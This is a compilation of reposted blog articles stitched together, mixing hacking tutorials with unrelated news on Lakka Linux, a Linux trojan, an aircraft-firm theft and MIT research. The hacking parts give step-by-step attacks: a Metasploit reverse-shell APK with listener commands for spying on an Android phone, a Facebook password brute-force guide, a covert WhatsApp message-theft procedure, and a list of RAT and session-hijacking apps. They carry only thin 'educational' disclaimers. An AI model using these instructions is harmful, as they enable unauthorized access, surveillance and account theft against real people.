Hack Android Remotely Using Kali Linux

This is a tutorial explaining how to remotely hack android device using Metasploit in Kali Linux.
Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.
We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.
First up you need to find your public/external ip and port forwarding
Let’s start,
Creating a booby trapped APK file
Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.
1. In Kali Linux, open a terminal prompt and type:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16LPORT=4444 R >app.apk
(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for the LPORT address.)

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.
Once this is run, a file called “app.apk” will be created:

2. Now just send this file to your Android device, I used a Smart Phone in this instance.
3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!
Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.
4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
5. Once Metasploit starts, type in the following to create a listener:
user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444

Then just type exploit to start the handler:

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.
7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.
On your Metaploit system you should see this:

An active session is created and it drops you automatically into a meterpreter prompt.
8. From here your can type “sysinfo” to get information on the device:

9. You can see the processes running by typing, “ps”:

You are done!
Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.
Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.
Typing “help” at a meterpreter prompt will list all the command that are available.
We can also run the shell command that will drop us into a direct Terminal shell if we want:
meterpreter > shell
Process 1 created.
Channel 1 created.
ls
The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.
But if the phone was rooted, I should have been able to access them… Remotely…
This should be noted by people who have rooted their phone!
And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…
Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

(Source:- http://thehackersboard.com/hack-android-remotely-using-kali-linux/)

Convert Any Computer Into A Gaming Console With Lakka Linux.

It’s time to go to your basement, clean your dusty old PC and make it ready for something fun. Using the lightweight Linux distro Lakka, you can turn that old pal into a retro gaming machine. This ready-to-install system is derived from OpenELEC, a version of Kodi home theater software. The OS also acts as a DIY retro emulation console based upon the RetroArch emulator software.

The strength of Lakka lies in the wide range of hardware it supports and useful feature like Braid-like rewinding, video streaming, and joypad hotplug. Once installed on your SD card, it is easy to set up and runs all your favorite vintage games.

The hardware needed to run Lakka costs as low as $30. It runs on a variety of computer boards including PCs, Raspberry Pi, Raspberry 2, Odroid, Banana Pi, CuBox-i, Cubietruck, Cubieboard 2, HummingBoard etc. Apart from the PC and these development boards, Lakka also supports gaming controllers like PlayStation, Nintendo, and XBox.

Lakka’s interface is very clean and similar to PS4 and PS3 operating systems where consoles run horizontally across the screen and games run vertically. As soon as you plug in any PS or XBox controller, it’s recognized instantly and you can use it right away.

However, if you choose to install it on a PC, Lakka is expected to perform more smoothly. These ideas were already out there and implemented, but Lakka makes everything much easier.

You just need to download Lakka from its website, transfer it to your USB drive and you have the option of running the installer or running Lakka live the drive.

Lakka is currently under heavy development and you can contribute to this open source project on GitHub if you notice some bug.

(Source:- http://www.geekboy.co/tutorials/convert-any-computer-into-a-gaming-console/# )

                                                                       BackDoor

A back door is a means of access to a computer program that bypasses security mechanisms. A programmer may sometimes install a back door so that the program can be accessed for troubleshooting or other purposes. However, attackers often use back doors that they detect or install themselves, as part of an exploit. In some cases, a worm is designed to take advantage of a back door created by an earlier attack. For example, Nimda gained entrance through a back door left by Code Red.

Whether installed as an administrative tool or a means of attack, a back door is a security risk, because there are always crackers out there looking for any vulnerability to exploit. In her article “Who gets your trust?” security consultant Carole Fennelly uses an analogy to illustrate the situation: “Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn’t have time to go through all that might just rig up a back exit so they can step out for a smoke — and then hope no one finds out about it.”

Direct connection:

Backdoors are usually based on a client-server network communication,where the server is the attacked machine,

and the client is the attacker.It is a kind of standard. This is called direct connection,when the client directly connects to the server.  The server application is installed on the computer you want to control and is hidden from the victim.

When the server application is runned,it will start listening for incoming connections from the client. Attackers use the client application is different from the server,as it has a GUI (graphic user interface) that allows the attacker to connect to the server remotely,by specifying the IP address of the server computer and the port number (1-65535) on which the server application is listening. If the connection is successfull,the client can now retreave information about the server and send commands to it. The server recognizes the commands,and executes a part of code for each commands.

For example,when you send a command “cdopen”,the server will open the CD-ROM door. If the connection attempt failed,the server isn’t running on the remote machine,or a firewall/router is blocking the access to the port used by the server.

Reverse connection:

This kind of connection between the server and the client became popular when routers became popular too. The main advantage is that the server (or multiple servers) connect to a single client,bypassing routers. Secondly,the client can send a single command to multiple servers that are connected (broadcasting). Data exchange is same as in the direct communication.

(Source:- http://www.geekboy.co/hacking/whats-back-door-and-how-does-it-work/)

 

       FACEBOOK PASSWORD USING BRUTE FORCE ATTACK (99% WORKING)

Note:-  This Article Is Not or Noobs! Learners Are Welcomed! this Article Is For Educational Purposes Only, Any Misuse Of Information Given Below Is Prohibited! We Will Not Be Responsible For Malfunctions Mad By You.

Hi Friends! I am back with a fresh tutorial here, and this time its on hacking facebook! The method I am going to use here will be brute forcing, Using World’s Best Passwords Dictionary, CrackStation,

So, First lets know something about Brute force attacks,

“A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.”

But, In our case I’ll be using a Python script and a Long Dictionary Of passwords. I have personally tried it on myself and it really works :) .

Here’s the list of what we need:

• A Kali Machine / Or Any Python Engine Will work!
• Facebook.py ( v1 or v2 <v1 Recommended Because Not Used v2 yet!>)
• And, A FaceBook ID Ofcourse :p
• CrackStation Word List! (Download Here)

Now, Lets Start The Work!

step 1. Install Python-mechanize using command mention below

[*] root@root:~#apt-get install python-mechanize

step 2.

Add facebook.py using the command below

[*] root@root~# chmod +x facebook.py

[*] root@root:~# python facebook.py

  

step 3.

Now enter |Email| or |Phone number| or |Profile ID number| or |Username| of the victim,                                                                 You can use graph.facebook.com for more information!

Step 4 .

Now Give The Path Of Your CrackStation Word list !

step 5.

Now it will try all passwords present in the word list, So relax and have a cup of coffee because it will take time depending on speed of your processor and password strength of your victim!

Hope this article was helpful :) Any feedback or Questions? Leave a Comment And I’ll be Happy To Help.

(source:- http://thehackersboard.com/brute-force-facebook-passwords-99-working/)

We can't say that "Linux is Safe"!
‪#‎Trojan‬ ‪#‎Linux‬ ‪#‎LinuxEkoms1‬ ‪#‎DrWeb‬ ‪#‎CyberSecurity‬ ‪#‎infosec‬ ‪#‎CDI‬ ‪#‎hacking‬

Dr. Web discovered a New Trojan in Linux!

All user thinks that OS X and Linux are safe as compare to Windows, against malicious attacks. But this belief is totally wrong. OS X is on the top for having maximum Vulnerabilities in 2015 and It's Gatekeeper is also vulnerable. If we talk about Linux, Dr. Web (A Russian Security Firm) found a new Trojan Dubbed “Linux.Ekoms.1” which is targeting users by taking screenshots of their systems after every 30 seconds. It is a bad news for Linux users. Linux also had been targetted by a ransomware called “Linux.Encoder” in October, 2015.
Dr. Web said that Linux.Ekoms.1 Trojan is a different type of danger for Linux users. Once it got entry in the system of user, it could be harmful for user in many forms. This Trojan is capable to take screenshots of victim's computer after every 30 seconds and can save these screenshots in .JPEG or BMP format on the remote server with the extension “.sst”. It can also record sounds of system and save them in WAV format using extension “.aat”.
This Trojan checks the temporary files folder to scan its file because it is capable to download and upload files from this folder to the remote server. The address of the remote server is present in this Trojan in Hardcoded Scripts. After activation, Trojan mainly search for two files “$HOME/$DATA/.dropbox/DropboxCache” and “$HOME/$DATA/.mozilla/firefox/profiled”.
If Trojan did not found these two files, it will save some new files by itself with a new name in temporary folder. These files will establish connection between Trojan and Remote Server. This remote server has the control of Trojan “Linux.Ekoms.1”. All the information sent by Trojan to the server will be in Encrypted form. This Trojan have a number of features, which are dangerous for user. This Trojan can enable and disable a number of services of user's system automatically.The Trojan sends the screenshots of victim's system to remote server and by analysing these screenshots hackers can steal the sensitive information of user.
There is no information about, how this Trojan enter in the system of Linux user. But it should not be underestimated because it is a big danger for Linux users as it has many features which can steal the sensitive information of user.

(Source :- http://www.cyberintelligence.in/Linux.Ekoms.1-trojan-is-targetting-linux/)

                    Drones dodge obstacles

Motion-planning algorithms allow drones to do donuts, figure-eights in object-filled environments.

(MIT NEWS Adam Conner-Simons | CSAIL)

Getting drones to fly around without hitting things is no small task. Obstacle-detection and motion-planning are two of computer science’s trickiest challenges, because of the complexity involved in creating real-time flight plans that avoid obstacles and handle surprises like wind and weather.
In a pair of projects announced this week, researchers from MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL) demonstrated software that allow drones to stop on a dime to make hairpin movements over, under, and around some 26 distinct obstacles in a simulated “forest.”

One team’s video shows a small quadrotor doing donuts and figure-eights through an obstacle course of strings and PVC pipes. Weighing just over an ounce and clocking in at 3 and a half inches from rotor to rotor, the drone can fly through the 10-square-foot space at speeds upwards of 1 meter per second.
The team’s algorithms, which are available online and were previously used to plan footsteps for CSAIL’s Atlas robot at last year's DARPA Robotics Challenge, segment space into “obstacle-free regions” and then link them together to find a single collision-free route.
“Rather than plan paths based on the number of obstacles in the environment, it’s much more manageable to look at the inverse: the segments of space that are ‘free’ for the drone to travel through,” says recent graduate Benoit Landry '14 MNG '15, who was first author on a related paper just accepted to the IEEE International Conference on Robotics and Automation (ICRA). “Using free-space segments is a more ‘glass-half-full’ approach that works far better for drones in small, cluttered spaces.”
In a second CSAIL project, PhD student Anirudha Majumdar showed off a fixed-wing plane that is guaranteed to avoid obstacles without any advanced knowledge of the space, and even in the face of wind gusts and other dynamics. His approach was to pre-program a library of dozens of distinct “funnels” that represent the worst-case behavior of the system, calculated via a rigorous verification algorithm.
“As the drone flies, it continuously searches through the library to stitch together a series of paths that are computationally guaranteed to avoid obstacles,” says Majumdar, who was lead author on a related technical report. “Many of the individual funnels will not be collision-free, but with a large-enough library you can be certain that your route will be clear.”
Both papers were co-authored by MIT professor Russ Tedrake; the ICRA paper, which will be presented in May in Sweden, was also co-written by PhD students Robin Deits and Peter R. Florence.
Drones in high-density
A bird might make it seem simple, but flight is a highly complicated endeavor. A flying object can change position in six distinct directions — forward/backward (“surge”), up/down (“heave”), left/right (“sway”), and by rotating front-to-back (“pitch”), side-to-side (“roll”), and horizontally (“yaw”).
“At every moment in time there are 12 distinct numbers needed to describe where the system it is and how quickly it is moving, on top of simultaneously tracking other objects in the space that could get in your way,” says Majumdar. “Most techniques typically can’t handle this sort of complexity in real-time.”
One common motion-planning approach is to sample the whole space through algorithms like the “rapidly-exploring random tree.” Although often effective, sampling-based approaches are generally less efficient and have trouble navigating small gaps between obstacles.
Landry’s team opted to use Deits’ new free-space-based technique, which he calls the “Iterative Regional Inflation by semidefinite programming” algorithm (IRIS). They then coupled IRIS with a “mixed-integer semidefinite program” (MISDP) that assigns specific flight movements to each “space-free region” and then executes the full plan.
To sense its surroundings, the drone used motion-capture optical sensors and an on-board inertial measurement unit (IMU) that help estimate the precise positioning of obstacles.
“I’m most impressed by the team’s ingenious technique of combining on- and off-board sensors to determine the drone's location,” says Jingjin Yu, an assistant professor of computer science at Rutgers University. “This is key to the system’s ability to create unique routes for each set of obstacles."
In its current form, MISDP has been optimized such that it can’t do real-time planning; it takes an average of 10 minutes to create a route for the obstacle course. But Landry says that making certain sacrifices would let them generate plans much more quickly.
“For example, you could define ‘free-space regions’ more broadly as links between areas where two or more free-space regions overlap,” says Landry. “That would let you solve for a general motion-plan through those links, and then fill in the details with specific paths inside of the chosen regions. Currently we solve both problems at the same time to lower energy consumption, but if we wanted to run plans faster that would be a good option.”
Majumdar’s software, meanwhile, generates more conservative plans, but can do so in real-time. He first developed a library of 40 to 50 trajectories that are each given an outer bound that the drone is guaranteed to remain within. These bounds can be visualized as ”funnels” that the planning algorithm chooses between to stitch together a sequence of steps that allow the drone to plan its flying on the fly.
A flexible approach like this comes with a high level of guarantees that the software will work, even in the face of uncertainties with both the surroundings and the hardware itself. The algorithm can easily be extended to drones of different sizes and payloads, as well as ground vehicles and walking robots.
As for the environment, imagine the drone choosing between making a forceful roll maneuver that will avoid a tree by a large margin, versus flying straight and avoiding a tree by a small amount.
“A traditional approach might prefer the first since avoiding obstacles by a significant amount seems ‘safer,’” Majumdar says. “But a move like that actually may be riskier because it’s more susceptible to wind gusts. Our method makes these decisions in real-time, which is critical if we want drones to move out of the labs and operate in real-world scenarios.”
A clear path to avoiding obstacles
CSAIL researchers have been working on this problem for many years. Professor Nick Roy has been honing algorithms for drones to develop maps and avoid objects in real-time; in November a team led by PhD student Andrew Barry published a video demonstrating algorithms that allow a drone to dart between trees at speeds of 30 miles per hour.
While these two drones cannot travel quite as fast as Barry’s, their maneuvers are generally more complex, meaning that they can navigate in smaller, denser environments.
“Enabling dynamic flight of small, off-the-shelf quadcopters is a marvelous achievement, and one that has many potential applications,” Yu says. “With additional development, I can imagine these machines being used as probes in hard-to-reach places, from exploring caves to doing search-and-rescue in collapsed buildings.”
Landry, who now works for 3D Robotics in California, is hopeful that other academics will build on and refine the researchers’ work, which is all open-source and available on github.
“A big challenge for industry is determining which technologies are actually mature enough to use in real products,” Landry says. “The best way to do that is to conduct experiments that focus on all of the corner cases and can demonstrate that algorithms like these will actually work 99.999 percent of the time.”
Landry's work was partially supported by the Siebel Scholars Foundation, while Majumdar's work was supported by a grant from the Office of Naval Research.

                         Organ-on-a-chip

In a step toward personalized drug testing, researchers coax human stem cells to form complex tissues.

(Helen Knight | MIT News correspondent) 

A new technique for programming human stem cells to produce different types of tissue on demand may ultimately allow personalized organs to be grown for transplant patients.
The technique, which also has near-term implications for growing organ-like tissues on a chip, was developed by researchers at MIT and is unveiled in a study published today in the journal Nature Communications.
Growing organs on demand, using stem cells derived from patients themselves, could eliminate the lengthy wait that people in need of a transplant are often forced to endure before one becomes available.
It could also reduce the risk of a patient’s immune system rejecting the transplant, since the tissue would be grown from the patient’s own cells, according to Ron Weiss, professor of biological engineering at MIT, who led the research.
“Imagine that there is a patient with liver complications,” Weiss says. “We could take skin cells from that person and then [convert] them into stem cells, and then genetically program them to make the liver tissue, and transplant that into the patient.”
A rudimentary organ
The researchers developed the new technique while investigating whether they could use stem cells to produce pancreatic beta cells for treating patients with diabetes.
In order to do this, the researchers needed to devise a means to convert stem cells into pancreatic beta cells on demand.
As a first step in this process, they took human induced pluripotent stem (IPS) cells — stem cells generated from adult fibroblast, or skin cells — and converted them into “endoderm,” one of the three primary cell types in a developing organism. Endoderm, mesoderm, and ectoderm make up the three so-called germ layers that contribute to nearly all of the different cell types in the body. “They are the first real step of [cell] differentiation,” Weiss says.
The researchers developed a method to use a type of small molecule called dox to induce the IPS cells to express a protein known as GATA6. This protein can convert IPS cells into endoderm.
Rather than immediately attempting to convert these endoderm cells into pancreatic cells though, the paper’s lead author, Patrick Guye, a former postdoc in Weiss’ lab and currently laboratory head with Sanofi-Aventis in Frankfurt, Germany, then decided to allow the cells to continue growing, to monitor their progress.
After two weeks, the researchers found that the endoderm, and some mesoderm also present in the cell culture, had matured further, to form a liver “bud,” or small, rudimentary liver.
“We observed the development of many cells types found in the fetal liver, including the development of blood vessel-like networks, various mesenchymal precursors, and the formation of early red and white blood cells within our liver-like tissue,” Guye says. “This is especially exciting, as the process looks very similar if not identical to what is happening in the early liver bud in vivo, that is, in our own development.”
What’s more, the researchers discovered that only those IPS cells that had been exposed to more of the genetic programming, and had therefore gone on to produce more GATA6, became liver tissue. Alongside these were IPS cells that did not make much GATA6, which went on to form ectoderm instead, and then further matured to become early telencephalon, or forebrain.
By controlling how much GATA6 the cells expressed, the researchers were able to determine how much liver bud and how much forebrain tissue was generated, Weiss says.
This suggests that the technique could be used to produce not just individual tissue types, but different combinations of tissue, he says.
“The fact that we are able to produce endoderm, mesoderm, and ectoderm gives us great hope that we can take each of these germ layers and hopefully grow any kind of tissue we want,” he says.
Liver-on-a-chip
While it is likely to be some time before the technique can be used to generate transplant organs, it could be used almost immediately to grow different human tissue on which to test new drugs, Weiss says.
Using human stem cell-derived organ tissue to test new treatments could be far more reliable than testing on animals, since different species may react differently to a drug, he says.
The technique could also allow clinicians to carry out patient-specific drug testing. “If you are not sure whether you will have complications from taking a particular drug, then before you take it you could try it out on your own liver-on-a-chip,” Weiss says.
Similarly, the organ-on-a-chip could be used to monitor the interaction between different drugs that people may be taking.
“As people age, some are taking 10, 15, or 20 drugs together, and it’s impossible for the pharmaceutical companies to test all of these combinations for every individual. But we would be able to test that out,” he says. “That is something that can be done now.”
In addition to these therapeutic applications, the technique could allow researchers to gain a better understanding of the development of different types of tissue, such as the liver and neurons.
The paper reveals some intrinsic mechanisms underlying the interactions of stem cells during liver development, and provides a useful model that sheds light on the complex process of embryogenesis, says Bing Song, a professor of tissue engineering at Cardiff University in the UK, who was not involved in the research.
"In my field, which is combining genetically modified stem cells and physical stimulation (electrical and magnetic) to cure spinal cord injuries and degenerative disease, the paper has given me some very useful ideas," he says.
The researchers now hope to investigate whether they can use the technique to grow other organs on demand, such as a pancreas.

r4hu1

Based upon the industry reviews and our own experience, here is a compilation of the top Android hacking applications. Along with the description of apps, we have provided the relevant website and download links to help you get started instantly.

Disclaimer: Please note that we're publishing this list just for educational purposes. We don’t support use of any tool to indulge in some unethical purposes.

• AndroRAT

  AndroRAT stands for Android and RAT (Remote Administrative Tools). This top hacking tool was released a long time ago as a client/server application. The app aims to give you the control of the Android system remotely and fetch the information from it. This Android app runs as a service right after the boot. So, a user doesn’t need to interact with the service. The app provides you the ability to trigger the server connection by a call or SMS.
  The features in this useful Android hacking app include collecting information like contacts, call logs, messages, and location. The app also allows you to remotely monitor received message and state of phone, making a phone call and sending texts, taking picture from camera, opening URL in the default browser etc.
  
  
  — AndroRAT
  
  
  

   

   
• Hackode
                                                                                                                                                               Hackode is an Android app which is basically a collection of multiple tools for ethical hackers, IT specialists, and penetration testers. In the app, there are three modules –Reconnaissance, Scanning, Security Feed — available in the application.
  With this app, you get the functionalities like Google hacking, SQL Injection, MySQL Server, Whois, Scanning, DNS lookup, IP, MX Records, DNS Dif, Security RSS Feed, Exploits etc. It’s a great Android hacking app to start with and it doesn’t ask for your private information to operate
  .
  — Hackode
  
  
  
    
•  zANTI                                                                                                                                                             zANTI is a reputed Android hacking suite from Zimperium. This software suite comes with multiple tools that are widely used for penetration testing purposes. This mobile penetration testing toolkit allows the security researchers to scan a network easily. This toolkit allows the IT administrators to simulate an advanced hacking environment to detect multiple malicious techniques.
  zANTI could be called an app that brings the power of Backtrack on your Android device. As soon as you login into zANTI, it maps the entire network and sniffs the websites being visited along with their cookies — thanks to ARP cache poisoning on devices.
  The various modules in the app are network mapping, port discovery, sniffing, packet manipulation, DoS, MITM, and more.
  
  — zANTI
  
  
  
   

• FaceNiff

  FaceNiff is a top Android hacking app that allows you to intercept and sniff your WiFi network traffic. This tool is widely used to snoop into people’s Facebook, Twitter and other social media websites using your Android device. This hacker-favorite tool steals cookies from WiFi network and gives an attacker an unauthorised access to victim’s account.
  FaceNiff is developed by Bartosz Ponurkiewicz — the same developer who wrote Firesheep for Firefox hacking on desktop.
  
  — FaceNiff 
  
  
   

• Droidsheep

  Droidsheep is an effective hacking app developed for security analysts interested in playing with Wi-Fi networks. The app has the ability to hijack the web session profiles over a network and it works with almost all services and websites.
  As you fire up the Droidsheep app, it acts a router that monitors and intercepts all the Wi-Fi network traffic and fetches the profiles of active sessions. With this app, one can sniff Facebook, LinkedIn, Twitter and other social media accounts.
  DroidSheep Guard, another version of app, helps you to detect ARP-Snoofing on the networks i.e. the attacks by FaceNiff, Droidsheep, and other software.
  
  — Droidsheep
  
  
  
   

• DroidBox

  DroidBox is an app that offers dynamic analysis of Android applications. Using the app, one can get a wide range of results about the hashes for the APK package, network traffic, SMS and phone calls, information leaks via different channels etc.
  This top Android hacking application also gives you the ability to visualize the behaviour of an Android app package

          — DroidBox



 

• APKInspector                                                                                                                                                                                                          APKInspector is an app that allows you to perform reverse engineering tricks. With this app, you can get the graphic features and analysis functions for the users to get a deep insight. This powerful Android hacking tool helps you get the source code of any Android app and visualize the DEX code to erase the credits and license.

          — APKInspector



   

• Nmap                                                                                   

  One of the most popular network scanning apps for desktop can also be used on Android operating system. Nmap works on both non-rooted and rooted phones. If you are a beginner Android hacker, this hacking app app is a must have.

   — Nmap

   

   

   

   

• SSHDroid                                                                                                                                                             SSHDroid is a SSH server implementation developed for Android that allows you to connect your Android device to a PC and run commands like ‘terminal’ and ‘adb shell’ and edit files. It provides an extra security later when you are connecting to a remote machine.
  The app provides features like shared-key authentication, WiFi autostart whitelist, extended notification control etc.
  
  — SSHDroid
  
  
  
  
  (Source :- http://www.geekboy.co)

$55 million stolen by Hackers from Aircraft Company!
Hackers hacked systems of FACC's (Aerospace Parts Manufacturer company) financial accounting department and steal $55 million from its money boxes. This company is one from the biggest suppliers of US Aircraft company Boeing.Chinese Aviation Corporation is the largest shareholder of this aircraft company. Company is saying that their sensitive data and all the intellectual property is safe. Only cash has been stolen by the Hackers.If this theft of $55 million is accurate then it is a notable attack. According to Ponemon study of last year, every data breach brings an average loss of $3.9 million for affected company.
Boeing is a client of an Austrian based comapny and this company gave a statement by publishing a post on their website,” It seems like hackers did not steal any intellectual data and all the operations of company are safe and did not touched by the Hackers.”
FACC gave a clearification about this incident on January 19 of this year. The financial department of FACC was the target of Hakcers in this case, told by investigation team. Investigation Team said all the IT infrastructure, information, IP rights and business operations of company are safe because the hackers did not touch them. The company is facing the loss of $55 million for which hackers attacked on the company.
Management team of FACC is evaluating the total damage due to this attack. Management team said that this attack will not effect the production of company. Last year Ryanair Airline's budget database was hacked by hackers. This airline is the part of FACC. In that hack total damage was of $5 million. All the money was transffered to a Chinese Bank.

(Source :- http://www.cyberintelligence.in/Hackers-steal-55million-dollars-from-FACC/)

On Daily we have heard news about online services is suffering from a lack of security. In February WhatsApp has been down for nearly four hours,
as if this were not enough, people became aware of the security flaw that allows conversations that should be read by anyone provided it learn properly perform the procedures.

Steps to follow:

1 - First of all you need to have the device at hand, use the Social Engineering and be quick in getting the e-mail and backup files msgstore-2014-05-02.1.db.crypt5.
To get the email for this follow the procedures below.

Enter the Play Store and view the e-mail, or write down mentalize somewhere without the person noticing.

Now Go to the device settings from Settings -> Accounts & Sync, look for the email from Google and mentalize or write down somewhere without the person noticing.

2 - Now let's take the msgstore-2014-05-08.1.db.crypt7 file To do this, use Polaris Office or any other app that allows you to navigate between folders and manage files.

Follow this path: My files -> WhatsApp -> Databases - In this directory you will find all the backup files of your messenger.
When you do find the file sharing for your mobile phone via bluetooth.

3 - Have we got the e-mail and file backup http://whatcrypt.com/?cmd=_decrypt
we enter the site and send the backup file.

To Submit follows:
Account: Enter the email of the victim
Database: Select the database backup
Click Process / download zip
Save the zip file on your desktop

4 - Once you have downloaded the backup file in zip format we now need to download the tool to extract the backup and we have access to conversations. Save on the desktop.

WhatsApp Decrypt MediaFire: http://www.mediafire.com/download/hw7m1590ld27vd5/WhatsApp_Decrypt.rar

Scanner Virus Total: https://www.virustotal.com/pt/file/c58bbef257e1ada303478b468a2b68523cbd307e1620d76d53489763e0ef5e15/analysis/1399523236/

5 - From the desktop to extract the file WhatsApp Decrypt.zip install python-3.4.0 folder and enter the WhatsApp.
Browse by: WhatsApp -> Whatsapp_Xtract_V2.1_2012-05-10-2

When you install python-3.4.0 do the following steps:

1 - Go to My Computer, click with the right mouse button and Properties -> Advanced System Settings

2 - In the System Properties navigate to the Advanced tab -> Environment Variables

3 - Environment Variables look for Path

4 - Edit the PATH

5 - At the end of PATH add ;C:\Python34

6 - Click ok and close

6 - Now extract the file from step 3 msgstore_decrypted on the desktop, copy and paste it on WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 and replace the file

7 - Replace the WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 from step 5 and
look for msgstore.dll file, drag it onto the whatsapp_xtract_drag'n'drop_database file (s) _here

After you drag it will create a file called msgstore.db.html the folder and ask you to press any key at the command prompt to continue ...
Pressing any key it will open in your default browser displaying the file msgstore.db.html all conversations, dates, numbers, etc...

Note: In step 2 print shows the crypt 7 but the crypt is correct 5!


Disclaimer: This tutorial is educational purpose only. We're not responsible for any kind of illegal activities. We believe in Security.
(Source :- http://hackersonlineclub.com/hack-whatsapp-account/)